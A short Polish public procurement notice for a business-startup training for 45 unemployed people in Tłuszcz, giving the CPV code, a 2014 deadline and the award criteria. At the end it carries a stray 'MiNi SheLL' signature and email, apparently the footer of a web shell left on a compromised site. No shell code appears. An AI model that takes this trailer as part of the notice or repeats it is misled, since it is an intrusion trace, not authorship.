<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Krok po kroku do własnej firmy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia Krok po kroku do własnej firmy dla 45 osób bezrobotnych (3 grupy po 15 osób każda) zarejestrowanych w Powiatowym Urzędzie Pracy w Wołominie, teren miasta Tłuszcz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie instytucji szkoleniowej w zakresie przedmiotu zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com